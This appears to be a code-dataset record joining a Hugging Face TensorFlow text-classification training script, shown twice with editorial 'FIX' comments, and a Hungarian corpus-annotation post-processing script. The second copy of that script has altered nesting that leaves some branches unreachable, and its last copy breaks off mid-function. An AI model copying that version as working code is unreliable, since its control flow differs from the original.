        config = AutoConfig.from_pretrained(
            config_path,
            num_labels=num_labels,
            cache_dir=model_args.cache_dir,
            revision=model_args.model_revision,
            use_auth_token=True if model_args.use_auth_token else None,
        )
    else:
        config = AutoConfig.from_pretrained(
            config_path,
            cache_dir=model_args.cache_dir,
            revision=model_args.model_revision,
            use_auth_token=True if model_args.use_auth_token else None,
        )
    tokenizer = AutoTokenizer.from_pretrained(
        model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
        cache_dir=model_args.cache_dir,
        revision=model_args.model_revision,
        use_auth_token=True if model_args.use_auth_token else None,
    )
    if checkpoint is None:
        model_path = model_args.model_name_or_path
    else:
        model_path = checkpoint
    model = TFAutoModelForSequenceClassification.from_pretrained(
        model_path,
        config=config,
        cache_dir=model_args.cache_dir,
        revision=model_args.model_revision,
        use_auth_token=True if model_args.use_auth_token else None,
    )
    # endregion

    # region Optimizer, loss and compilation
    optimizer = tf.keras.optimizers.Adam(
        learning_rate=training_args.learning_rate,
        beta_1=training_args.adam_beta1,
        beta_2=training_args.adam_beta2,
        epsilon=training_args.adam_epsilon,
        clipnorm=training_args.max_grad_norm,
    )
    if is_regression:
        loss = tf.keras.losses.MeanSquaredError()
        metrics = []
    else:
        loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
        metrics = ["accuracy"]
    model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
    # endregion

    # region Dataset preprocessing
    # Again, we try to have some nice defaults but don't hesitate to tweak to your use case.
    column_names = {col for cols in datasets.column_names.values() for col in cols}
    non_label_column_names = [name for name in column_names if name != "label"]
    if "sentence1" in non_label_column_names and "sentence2" in non_label_column_names:
        sentence1_key, sentence2_key = "sentence1", "sentence2"
    elif "sentence1" in non_label_column_names:
        sentence1_key, sentence2_key = "sentence1", None
    else:
        if len(non_label_column_names) >= 2:
            sentence1_key, sentence2_key = non_label_column_names[:2]
        else:
            sentence1_key, sentence2_key = non_label_column_names[0], None

    # Padding strategy
    if data_args.pad_to_max_length:
        padding = "max_length"
    else:
        # We will pad later, dynamically at batch creation, to the max sequence length in each batch
        padding = False

    if data_args.max_seq_length > tokenizer.model_max_length:
        logger.warning(
            # FIX: the two f-string fragments previously concatenated without a
            # space, producing "...for themodel...".
            f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the "
            f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}."
        )
    max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length)

    # Ensure that our labels match the model's, if it has some pre-specified
    if "train" in datasets:
        if not is_regression and model.config.label2id != PretrainedConfig(num_labels=num_labels).label2id:
            label_name_to_id = model.config.label2id
            if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
                label_to_id = label_name_to_id  # Use the model's labels
            else:
                # FIX: this used to pass the f-string as a *second* positional
                # argument to logger.warning(), where it was treated as a
                # %-formatting argument and never shown; merge into one message.
                logger.warning(
                    "Your model seems to have been trained with labels, but they don't match the dataset: "
                    f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels: {list(sorted(label_list))}."
                    "\nIgnoring the model labels as a result.",
                )
                label_to_id = {v: i for i, v in enumerate(label_list)}
        elif not is_regression:
            label_to_id = {v: i for i, v in enumerate(label_list)}
        else:
            label_to_id = None
        # Now we've established our label2id, let's overwrite the model config with it.
        model.config.label2id = label_to_id
        if model.config.label2id is not None:
            model.config.id2label = {id: label for label, id in label_to_id.items()}
        else:
            model.config.id2label = None
    else:
        label_to_id = model.config.label2id  # Just load the data from the model
    if "validation" in datasets and model.config.label2id is not None:
        validation_label_list = datasets["validation"].unique("label")
        for val_label in validation_label_list:
            assert val_label in label_to_id, f"Label {val_label} is in the validation set but not the training set!"

    def preprocess_function(examples):
        # Tokenize the texts
        args = (
            (examples[sentence1_key],) if sentence2_key is None else (examples[sentence1_key], examples[sentence2_key])
        )
        result = tokenizer(*args, padding=padding, max_length=max_seq_length, truncation=True)
        # Map labels to IDs
        if model.config.label2id is not None and "label" in examples:
            result["label"] = [(model.config.label2id[l] if l != -1 else -1) for l in examples["label"]]
        return result

    datasets = datasets.map(preprocess_function, batched=True, load_from_cache_file=not data_args.overwrite_cache)

    if "train" in datasets:
        train_dataset = datasets["train"]
        if data_args.max_train_samples is not None:
            train_dataset = train_dataset.select(range(data_args.max_train_samples))
        # Log a few random samples from the training set so we can see that it's working as expected:
        for index in random.sample(range(len(train_dataset)), 3):
            logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
    if "validation" in datasets:
        eval_dataset = datasets["validation"]
        if data_args.max_eval_samples is not None:
            eval_dataset = eval_dataset.select(range(data_args.max_eval_samples))
    if "test" in datasets:
        predict_dataset = datasets["test"]
        if data_args.max_predict_samples is not None:
            predict_dataset = predict_dataset.select(range(data_args.max_predict_samples))
    # endregion

    # region Training
    if "train" in datasets:
        training_dataset = DataSequence(
            train_dataset, non_label_column_names, batch_size=training_args.per_device_train_batch_size, labels=True
        )
        if "validation" in datasets:
            eval_dataset = DataSequence(
                eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
            )
        else:
            eval_dataset = None
        callbacks = [SavePretrainedCallback(output_dir=training_args.output_dir)]
        model.fit(
            training_dataset,
            validation_data=eval_dataset,
            epochs=int(training_args.num_train_epochs),
            callbacks=callbacks,
        )
    elif "validation" in datasets:
        # If there's a validation dataset but no training set, just evaluate the metrics
        eval_dataset = DataSequence(
            eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
        )
        logger.info("Computing metrics on validation data...")
        if is_regression:
            loss = model.evaluate(eval_dataset)
            logger.info(f"Loss: {loss:.5f}")
        else:
            loss, accuracy = model.evaluate(eval_dataset)
            logger.info(f"Loss: {loss:.5f}, Accuracy: {accuracy * 100:.4f}%")
    # endregion

    # region Prediction
    if "test" in datasets:
        logger.info("Doing predictions on Predict dataset...")
        predict_dataset = DataSequence(
            predict_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=False
        )
        predictions = model.predict(predict_dataset)["logits"]
        predictions = np.squeeze(predictions) if is_regression else np.argmax(predictions, axis=1)
        output_predict_file = os.path.join(training_args.output_dir, "predict_results.txt")
        with open(output_predict_file, "w") as writer:
            writer.write("index\tprediction\n")
            for index, item in enumerate(predictions):
                if is_regression:
                    writer.write(f"{index}\t{item:3.3f}\n")
                else:
                    item = model.config.id2label[item]
                    writer.write(f"{index}\t{item}\n")
        logger.info(f"Wrote predictions to {output_predict_file}!")
    # endregion


if __name__ == "__main__":
    main()
| 43.122677 | 121 | 0.671078 |
import logging
import os
import random
import sys
from dataclasses import dataclass, field
from math import ceil
from pathlib import Path
from typing import Optional
import numpy as np
from datasets import load_dataset
from transformers import (
AutoConfig,
AutoTokenizer,
HfArgumentParser,
PretrainedConfig,
TFAutoModelForSequenceClassification,
TrainingArguments,
set_seed,
)
from transformers.file_utils import CONFIG_NAME, TF2_WEIGHTS_NAME
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1"
import tensorflow as tf
logger = logging.getLogger(__name__)
class DataSequence(tf.keras.utils.Sequence):
    """Keras ``Sequence`` that serves batches from an in-memory 🤗 datasets split.

    Keras expects either dense arrays or a Sequence/generator. Dense arrays
    would require padding every example to the length of the longest example
    in the whole dataset and keeping everything in memory; this Sequence
    instead pads each batch only to the longest example *within* that batch,
    by stacking the variable-length rows into a ragged tensor.
    """

    def __init__(self, dataset, non_label_column_names, batch_size, labels, shuffle=True):
        super().__init__()
        # Keep only the tokenizer-produced columns: drop the original data
        # columns and the label column.
        self.data = {
            key: dataset[key]
            for key in dataset.features.keys()
            if key not in non_label_column_names and key != "label"
        }
        data_lengths = {len(array) for array in self.data.values()}
        assert len(data_lengths) == 1, "Dataset arrays differ in length!"
        self.data_length = data_lengths.pop()
        self.num_batches = ceil(self.data_length / batch_size)
        if labels:
            self.labels = np.array(dataset["label"])
            assert len(self.labels) == self.data_length, "Labels not the same length as input arrays!"
        else:
            self.labels = None
        self.batch_size = batch_size
        self.shuffle = shuffle
        if self.shuffle:
            self.permutation = np.random.permutation(self.data_length)
        else:
            self.permutation = None

    def on_epoch_end(self):
        # Reshuffle between epochs so batch composition changes each epoch.
        if self.shuffle:
            self.permutation = np.random.permutation(self.data_length)

    def __getitem__(self, item):
        # Note that this yields a whole batch, not a single sample.
        batch_start = item * self.batch_size
        # FIX: clamp the end index. The final batch may be smaller than
        # batch_size; a slice of `permutation` clamps implicitly, but the
        # unshuffled np.arange() path previously produced indices past the
        # end of the data and raised IndexError on the last partial batch.
        batch_end = min((item + 1) * self.batch_size, self.data_length)
        if self.shuffle:
            data_indices = self.permutation[batch_start:batch_end]
        else:
            data_indices = np.arange(batch_start, batch_end)
        # We want to pad the data as little as possible, so we only pad each batch
        # to the maximum length within that batch. We do that by stacking the variable-
        # length inputs into a ragged tensor and then densifying it.
        batch_input = {
            key: tf.ragged.constant([data[i] for i in data_indices]).to_tensor() for key, data in self.data.items()
        }
        if self.labels is None:
            return batch_input
        else:
            batch_labels = self.labels[data_indices]
            return batch_input, batch_labels

    def __len__(self):
        # Number of batches per epoch, as required by the Sequence contract.
        return self.num_batches
class SavePretrainedCallback(tf.keras.callbacks.Callback):
    # Hugging Face models have a save_pretrained() method that saves both the weights and the necessary
    # metadata to allow them to be loaded as a pretrained model in future. This is a simple Keras callback
    # that saves the model with this method after each epoch.
    def __init__(self, output_dir, **kwargs):
        """Store the target directory; extra kwargs are accepted for Keras compatibility and ignored."""
        super().__init__()
        self.output_dir = output_dir
    def on_epoch_end(self, epoch, logs=None):
        """Called by Keras after each epoch; snapshots the model in Hugging Face format."""
        self.model.save_pretrained(self.output_dir)
# endregion
# region Command-line arguments
@dataclass
class DataTrainingArguments:
    """
    Arguments pertaining to the data we feed the model for training and eval.

    All files are local CSV or JSON; ``__post_init__`` validates them and
    records the shared extension in ``input_file_extension``.
    """
    train_file: Optional[str] = field(
        default=None, metadata={"help": "A csv or a json file containing the training data."}
    )
    validation_file: Optional[str] = field(
        default=None, metadata={"help": "A csv or a json file containing the validation data."}
    )
    test_file: Optional[str] = field(default=None, metadata={"help": "A csv or a json file containing the test data."})
    max_seq_length: int = field(
        default=128,
        metadata={
            "help": "The maximum total input sequence length after tokenization. Sequences longer "
            "than this will be truncated, sequences shorter will be padded."
        },
    )
    overwrite_cache: bool = field(
        default=False, metadata={"help": "Overwrite the cached preprocessed datasets or not."}
    )
    pad_to_max_length: bool = field(
        default=False,
        metadata={
            "help": "Whether to pad all samples to `max_seq_length`. "
            "If False, will pad the samples dynamically when batching to the maximum length in the batch."
        },
    )
    # The three max_*_samples caps below are debugging aids: when set, the
    # corresponding split is truncated with Dataset.select() in main().
    max_train_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of training examples to this "
            "value if set."
        },
    )
    max_eval_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
            "value if set."
        },
    )
    max_predict_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of predict examples to this "
            "value if set."
        },
    )
    def __post_init__(self):
        """Require at least one data file; all given files must share one extension, csv or json."""
        train_extension = self.train_file.split(".")[-1].lower() if self.train_file is not None else None
        validation_extension = (
            self.validation_file.split(".")[-1].lower() if self.validation_file is not None else None
        )
        test_extension = self.test_file.split(".")[-1].lower() if self.test_file is not None else None
        extensions = {train_extension, validation_extension, test_extension}
        extensions.discard(None)
        assert len(extensions) != 0, "Need to supply at least one of --train_file, --validation_file or --test_file!"
        assert len(extensions) == 1, "All input files should have the same file extension, either csv or json!"
        assert "csv" in extensions or "json" in extensions, "Input files should have either .csv or .json extensions!"
        self.input_file_extension = extensions.pop()
@dataclass
class ModelArguments:
    """
    Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
    """
    model_name_or_path: str = field(
        metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
    )
    config_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
    )
    tokenizer_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
    )
    cache_dir: Optional[str] = field(
        default=None,
        metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
    )
    # Passed straight through to the from_pretrained() calls in main().
    model_revision: str = field(
        default="main",
        metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
    )
    # When True, main() passes use_auth_token=True to from_pretrained() (None otherwise).
    use_auth_token: bool = field(
        default=False,
        metadata={
            "help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
            "with private models)."
        },
    )
# endregion
def main():
    """Fine-tune, evaluate and/or predict with a TF sequence-classification model on local CSV/JSON data."""
    # region Argument parsing
    # See all possible arguments in src/transformers/training_args.py
    # or by passing the --help flag to this script.
    # We now keep distinct sets of args, for a cleaner separation of concerns.
    parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
    if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
        # If we pass only one argument to the script and it's the path to a json file,
        # let's parse it to get our arguments.
        model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
    else:
        model_args, data_args, training_args = parser.parse_args_into_dataclasses()
    output_dir = Path(training_args.output_dir)
    output_dir.mkdir(parents=True, exist_ok=True)
    # endregion

    # region Checkpoints
    # Detecting last checkpoint.
    checkpoint = None
    if len(os.listdir(training_args.output_dir)) > 0 and not training_args.overwrite_output_dir:
        if (output_dir / CONFIG_NAME).is_file() and (output_dir / TF2_WEIGHTS_NAME).is_file():
            checkpoint = output_dir
            logger.info(
                f"Checkpoint detected, resuming training from checkpoint in {training_args.output_dir}. To avoid this"
                " behavior, change the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
            )
        else:
            raise ValueError(
                f"Output directory ({training_args.output_dir}) already exists and is not empty. "
                "Use --overwrite_output_dir to continue regardless."
            )
    # endregion

    # region Logging
    logging.basicConfig(
        format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
        datefmt="%m/%d/%Y %H:%M:%S",
        handlers=[logging.StreamHandler(sys.stdout)],
    )
    logger.setLevel(logging.INFO)
    logger.info(f"Training/evaluation parameters {training_args}")
    # endregion

    # region Loading data
    # For CSV/JSON files, this script will use the 'label' field as the label and the 'sentence1' and optionally
    # 'sentence2' fields as inputs if they exist. If not, the first two fields not named label are used if at least two
    # columns are provided.
    #
    # If the CSVs/JSONs contain only one non-label column, the script does single sentence classification on this
    # single column.
    #
    # In distributed training, the load_dataset function guarantees that only one local process can concurrently
    # download the dataset.
    data_files = {"train": data_args.train_file, "validation": data_args.validation_file, "test": data_args.test_file}
    data_files = {key: file for key, file in data_files.items() if file is not None}
    for key in data_files.keys():
        logger.info(f"Loading a local file for {key}: {data_files[key]}")
    if data_args.input_file_extension == "csv":
        # Loading a dataset from local csv files
        datasets = load_dataset("csv", data_files=data_files, cache_dir=model_args.cache_dir)
    else:
        # Loading a dataset from local json files
        datasets = load_dataset("json", data_files=data_files, cache_dir=model_args.cache_dir)
    # endregion

    # region Label preprocessing
    # If you've passed us a training set, we try to infer your labels from it.
    if "train" in datasets:
        # A float-typed label column is treated as regression, anything else as classification.
        is_regression = datasets["train"].features["label"].dtype in ["float32", "float64"]
        if is_regression:
            num_labels = 1
        else:
            # FIX: this line arrived garbled (the `label_list =` target was
            # missing, a syntax error); restored the assignment.
            label_list = datasets["train"].unique("label")
            label_list.sort()  # sort for determinism
            num_labels = len(label_list)
    # If you haven't passed a training set, we read label info from the saved model (this happens later)
    else:
        num_labels = None
        label_list = None
        is_regression = None
    # endregion

    # region Load pretrained model and tokenizer
    # Set seed before initializing model
    set_seed(training_args.seed)
    if checkpoint is not None:
        config_path = training_args.output_dir
    elif model_args.config_name:
        config_path = model_args.config_name
    else:
        config_path = model_args.model_name_or_path
    if num_labels is not None:
        config = AutoConfig.from_pretrained(
            config_path,
            num_labels=num_labels,
            cache_dir=model_args.cache_dir,
            revision=model_args.model_revision,
            use_auth_token=True if model_args.use_auth_token else None,
        )
    else:
        config = AutoConfig.from_pretrained(
            config_path,
            cache_dir=model_args.cache_dir,
            revision=model_args.model_revision,
            use_auth_token=True if model_args.use_auth_token else None,
        )
    tokenizer = AutoTokenizer.from_pretrained(
        model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
        cache_dir=model_args.cache_dir,
        revision=model_args.model_revision,
        use_auth_token=True if model_args.use_auth_token else None,
    )
    if checkpoint is None:
        model_path = model_args.model_name_or_path
    else:
        model_path = checkpoint
    model = TFAutoModelForSequenceClassification.from_pretrained(
        model_path,
        config=config,
        cache_dir=model_args.cache_dir,
        revision=model_args.model_revision,
        use_auth_token=True if model_args.use_auth_token else None,
    )
    # endregion

    # region Optimizer, loss and compilation
    optimizer = tf.keras.optimizers.Adam(
        learning_rate=training_args.learning_rate,
        beta_1=training_args.adam_beta1,
        beta_2=training_args.adam_beta2,
        epsilon=training_args.adam_epsilon,
        clipnorm=training_args.max_grad_norm,
    )
    if is_regression:
        loss = tf.keras.losses.MeanSquaredError()
        metrics = []
    else:
        loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
        metrics = ["accuracy"]
    model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
    # endregion

    # region Dataset preprocessing
    column_names = {col for cols in datasets.column_names.values() for col in cols}
    non_label_column_names = [name for name in column_names if name != "label"]
    if "sentence1" in non_label_column_names and "sentence2" in non_label_column_names:
        sentence1_key, sentence2_key = "sentence1", "sentence2"
    elif "sentence1" in non_label_column_names:
        sentence1_key, sentence2_key = "sentence1", None
    else:
        if len(non_label_column_names) >= 2:
            sentence1_key, sentence2_key = non_label_column_names[:2]
        else:
            sentence1_key, sentence2_key = non_label_column_names[0], None

    # Padding strategy
    if data_args.pad_to_max_length:
        padding = "max_length"
    else:
        # We will pad later, dynamically at batch creation, to the max sequence length in each batch
        padding = False

    if data_args.max_seq_length > tokenizer.model_max_length:
        logger.warning(
            # FIX: the two f-string fragments previously concatenated without a
            # space, producing "...for themodel...".
            f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the "
            f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}."
        )
    max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length)

    # Ensure that our labels match the model's, if it has some pre-specified
    if "train" in datasets:
        if not is_regression and model.config.label2id != PretrainedConfig(num_labels=num_labels).label2id:
            label_name_to_id = model.config.label2id
            if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
                label_to_id = label_name_to_id  # Use the model's labels
            else:
                # FIX: this used to pass the f-string as a *second* positional
                # argument to logger.warning(), where it was treated as a
                # %-formatting argument and never shown; merge into one message.
                logger.warning(
                    "Your model seems to have been trained with labels, but they don't match the dataset: "
                    f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels: {list(sorted(label_list))}."
                    "\nIgnoring the model labels as a result.",
                )
                label_to_id = {v: i for i, v in enumerate(label_list)}
        elif not is_regression:
            label_to_id = {v: i for i, v in enumerate(label_list)}
        else:
            label_to_id = None
        # Now we've established our label2id, let's overwrite the model config with it.
        model.config.label2id = label_to_id
        if model.config.label2id is not None:
            model.config.id2label = {id: label for label, id in label_to_id.items()}
        else:
            model.config.id2label = None
    else:
        label_to_id = model.config.label2id  # Just load the data from the model
    if "validation" in datasets and model.config.label2id is not None:
        validation_label_list = datasets["validation"].unique("label")
        for val_label in validation_label_list:
            assert val_label in label_to_id, f"Label {val_label} is in the validation set but not the training set!"

    def preprocess_function(examples):
        # Tokenize the texts
        args = (
            (examples[sentence1_key],) if sentence2_key is None else (examples[sentence1_key], examples[sentence2_key])
        )
        result = tokenizer(*args, padding=padding, max_length=max_seq_length, truncation=True)
        # Map labels to IDs
        if model.config.label2id is not None and "label" in examples:
            result["label"] = [(model.config.label2id[l] if l != -1 else -1) for l in examples["label"]]
        return result

    datasets = datasets.map(preprocess_function, batched=True, load_from_cache_file=not data_args.overwrite_cache)

    if "train" in datasets:
        train_dataset = datasets["train"]
        if data_args.max_train_samples is not None:
            train_dataset = train_dataset.select(range(data_args.max_train_samples))
        # Log a few random samples from the training set so we can see that it's working as expected:
        for index in random.sample(range(len(train_dataset)), 3):
            logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
    if "validation" in datasets:
        eval_dataset = datasets["validation"]
        if data_args.max_eval_samples is not None:
            eval_dataset = eval_dataset.select(range(data_args.max_eval_samples))
    if "test" in datasets:
        predict_dataset = datasets["test"]
        if data_args.max_predict_samples is not None:
            predict_dataset = predict_dataset.select(range(data_args.max_predict_samples))
    # endregion

    # region Training
    if "train" in datasets:
        training_dataset = DataSequence(
            train_dataset, non_label_column_names, batch_size=training_args.per_device_train_batch_size, labels=True
        )
        if "validation" in datasets:
            eval_dataset = DataSequence(
                eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
            )
        else:
            eval_dataset = None
        callbacks = [SavePretrainedCallback(output_dir=training_args.output_dir)]
        model.fit(
            training_dataset,
            validation_data=eval_dataset,
            epochs=int(training_args.num_train_epochs),
            callbacks=callbacks,
        )
    elif "validation" in datasets:
        # If there's a validation dataset but no training set, just evaluate the metrics
        eval_dataset = DataSequence(
            eval_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=True
        )
        logger.info("Computing metrics on validation data...")
        if is_regression:
            loss = model.evaluate(eval_dataset)
            logger.info(f"Loss: {loss:.5f}")
        else:
            loss, accuracy = model.evaluate(eval_dataset)
            logger.info(f"Loss: {loss:.5f}, Accuracy: {accuracy * 100:.4f}%")
    # endregion

    # region Prediction
    if "test" in datasets:
        logger.info("Doing predictions on Predict dataset...")
        predict_dataset = DataSequence(
            predict_dataset, non_label_column_names, batch_size=training_args.per_device_eval_batch_size, labels=False
        )
        predictions = model.predict(predict_dataset)["logits"]
        predictions = np.squeeze(predictions) if is_regression else np.argmax(predictions, axis=1)
        output_predict_file = os.path.join(training_args.output_dir, "predict_results.txt")
        with open(output_predict_file, "w") as writer:
            writer.write("index\tprediction\n")
            for index, item in enumerate(predictions):
                if is_regression:
                    writer.write(f"{index}\t{item:3.3f}\n")
                else:
                    item = model.config.id2label[item]
                    writer.write(f"{index}\t{item}\n")
        logger.info(f"Wrote predictions to {output_predict_file}!")
    # endregion


if __name__ == "__main__":
    main()
| true | true |
f725f1eac8da74b8562cac6b78cc781c40c19706 | 4,237 | py | Python | szkriptek/tag_postproc.py | vadno/korkor_pilot | 8805f3a6a1145420f112d4c1ce95538c698d41ef | [
"CC-BY-4.0"
] | 2 | 2020-09-30T19:25:10.000Z | 2021-11-03T20:23:31.000Z | szkriptek/tag_postproc.py | vadno/korkor_pilot | 8805f3a6a1145420f112d4c1ce95538c698d41ef | [
"CC-BY-4.0"
] | null | null | null | szkriptek/tag_postproc.py | vadno/korkor_pilot | 8805f3a6a1145420f112d4c1ce95538c698d41ef | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: Vadász Noémi
# created: 2019/03/28
# feldolgozza a google spreadsheetsben annotált, előtte emtsv-vel elemzett korpuszfájlt
# bemenet
# csv (google spreadsheetsből importált)
# token, összes elemzés, tő, részletes címke, tag, helyes, javított tő, tokenizálás, javított token, megjegyzés
# tokenenként annyi sor, ahány különböző emmorph elemzés (címke+tő kombináció) van az anas oszlopban
# a kézzel kiválasztott címke+tő kombinációnál a 6. (helyes) oszlopban X szerepel
# ha nem üres a 6. oszlop, akkor a 2. oszlopba annak tartalma megy (lemma javítása)
# ha nem üres a 7. oszlop, akkor a tokenizálás javítását szolgáló parancsokat végre kell hajtani
# ha nem üres a 8. oszlop, akkor a 0. oszlopba annak tartalma megy (token javítása)
# kimenet
# xtsv
# form, anas, lemma, xpostag
# soronként egy token
# mondatok között üres sor
import csv
import sys
# 0: string
# 1: anas
# 2: lemma
# 3: hfstana
# 4: tag
# 5: helyes
# 6: javított tő
# 7: tokenizálás
# 8: javított token
# 9: megjegyzés
def read_file():
    """
    Read the annotated CSV from stdin.

    The first row is a header and is skipped. Tokenization-fix commands in
    column 7 ('token beszúr' = insert token, 'token össze' = merge tokens,
    'token töröl' = delete token, 'token szét' = split token,
    'mondat szét' = split sentence) are executed, and the rows are stored
    accordingly. Returns a list of dicts with keys string/anas/lemma/hfstana;
    a dict carrying only an empty 'string' marks a sentence boundary.
    """
    empty_line = dict()
    empty_line['string'] = ''
    lines = list()
    newtoken = dict()
    reader = csv.reader(sys.stdin)
    next(reader)
    for line in reader:
        # a new token starts here: flush the one under construction first
        if line[0] or line[7] == 'token beszúr':
            if newtoken:
                lines.append(newtoken)
                newtoken = dict()
            if line[7] not in ('token össze', 'token töröl'):
                if line[7] == 'token beszúr':
                    newtoken['anas'] = '[]'
                # NOTE(review): this unconditionally overwrites the '[]' set
                # just above for inserted tokens — confirm that is intended.
                newtoken['anas'] = line[1]
                # token form is correct
                if not line[8]:
                    newtoken['string'] = line[0]
                # token form was hand-corrected (column 8)
                else:
                    newtoken['string'] = line[8]
                # lemma is correct
                if not line[6]:
                    newtoken['lemma'] = line[2]
                # lemma was hand-corrected (column 6)
                else:
                    newtoken['lemma'] = line[6]
                # correct or corrected tag
                if line[5]:
                    # 'X' marks the analysis the annotator selected
                    if line[5] == 'X':
                        newtoken['hfstana'] = line[4]
                    # anything else is a hand-corrected tag
                    else:
                        newtoken['hfstana'] = line[5]
        # token merge
        else:
            # first row of a merged token
            if line[6] and line[7]:
                newtoken['string'] = line[8]
                newtoken['lemma'] = line[6]
                newtoken['anas'] = line[1]
                # correct tag
                if line[5] == 'X':
                    newtoken['hfstana'] = line[4]
                # corrected tag
                else:
                    newtoken['hfstana'] = line[5]
            # alternative analyses of the current token
            else:
                # an alternative tag + lemma was selected
                if 'X' in line[5]:
                    newtoken['lemma'] = line[2]
                    newtoken['hfstana'] = line[4]
                # token split
                elif line[7] == 'token szét':
                    lines.append(newtoken)
                    newtoken = dict()
                    newtoken['anas'] = '[]'
                    newtoken['string'] = line[8]
                    newtoken['lemma'] = line[6]
                    newtoken['hfstana'] = line[5]
                # sentence boundary (all-empty row) or explicit sentence split
                elif all(cell == '' for cell in line) or line[7] == 'mondat szét':
                    lines.append(newtoken)
                    lines.append(empty_line)
                    newtoken = dict()
    # flush the final token
    # NOTE(review): if the last command reset newtoken (e.g. 'mondat szét'),
    # this appends an empty dict, which print_file cannot render — verify inputs.
    lines.append(newtoken)
    return lines
def print_file(lines):
    """Write the token list to stdout in xtsv format.

    Emits a header row, then one tab-separated row per token dict; a
    dict with a single key (a sentence separator) is printed as its
    bare 'string' value, and a trailing empty line closes the output.
    """
    print('form\tanas\tlemma\txpostag')
    for token in lines:
        if len(token) <= 1:
            print(token['string'])
        else:
            print(token['string'], token['anas'], token['lemma'], token['hfstana'], sep='\t')
    print('')
def main():
    """Entry point: read the correction CSV from stdin, emit xtsv on stdout."""
    print_file(read_file())


if __name__ == "__main__":
    main()
| 26.987261 | 111 | 0.509559 |
import csv
import sys
def read_file():
    """Parse the annotated correction CSV on stdin into a token list.

    Skips the header row, then interprets the tokenization commands in
    column 7 ('token beszúr', 'token össze', 'token töröl', 'token
    szét', 'mondat szét') to insert, merge, delete or split tokens.
    Returns a list of token dicts; a sentence boundary appears as a
    dict containing only {'string': ''}.
    """
    empty_line = dict()
    empty_line['string'] = ''
    lines = list()
    newtoken = dict()
    reader = csv.reader(sys.stdin)
    # discard the header row
    next(reader)
    for line in reader:
        # start of a new token: non-empty form column, or an insertion command
        if line[0] or line[7] == 'token beszúr':
            if newtoken:
                lines.append(newtoken)
            newtoken = dict()
            if line[7] not in ('token össze', 'token töröl'):
                if line[7] == 'token beszúr':
                    # NOTE(review): dead store -- immediately overwritten by
                    # the next line; TODO confirm inserted tokens really
                    # carry a usable value in column 1.
                    newtoken['anas'] = '[]'
                newtoken['anas'] = line[1]
                # column 8 empty: keep the original form; otherwise use the fix
                if not line[8]:
                    newtoken['string'] = line[0]
                else:
                    newtoken['string'] = line[8]
                # column 6 empty: keep the original lemma; otherwise use the fix
                if not line[6]:
                    newtoken['lemma'] = line[2]
                else:
                    newtoken['lemma'] = line[6]
                if line[5]:
                    # 'X' marks the existing tag as correct
                    if line[5] == 'X':
                        newtoken['hfstana'] = line[4]
                    # otherwise column 5 holds the corrected tag
                    else:
                        newtoken['hfstana'] = line[5]
                # NOTE(review): line[5] is falsy here, so neither
                # line[5] == 'X' nor 'X' in line[5] below can ever be
                # true; this else may have been intended one level up
                # (pairing with the merge/delete guard) -- TODO confirm.
                else:
                    # first row of a token merge: corrected fields present
                    if line[6] and line[7]:
                        newtoken['string'] = line[8]
                        newtoken['lemma'] = line[6]
                        newtoken['anas'] = line[1]
                        if line[5] == 'X':
                            newtoken['hfstana'] = line[4]
                        else:
                            newtoken['hfstana'] = line[5]
                    # alternative analyses
                    else:
                        # alternative tag and lemma given
                        if 'X' in line[5]:
                            newtoken['lemma'] = line[2]
                            newtoken['hfstana'] = line[4]
        # token split: finish the current token, start one from the fix columns
        elif line[7] == 'token szét':
            lines.append(newtoken)
            newtoken = dict()
            newtoken['anas'] = '[]'
            newtoken['string'] = line[8]
            newtoken['lemma'] = line[6]
            newtoken['hfstana'] = line[5]
        # sentence boundary (all-empty row) or explicit sentence split
        elif all(cell == '' for cell in line) or line[7] == 'mondat szét':
            lines.append(newtoken)
            lines.append(empty_line)
            newtoken = dict()
    # flush the final in-progress token
    lines.append(newtoken)
    return lines
def print_file(lines):
    """Emit the parsed tokens on stdout as xtsv.

    Header first, then each full token dict as a tab-joined row; a
    one-key dict (sentence separator) prints as its bare string, and
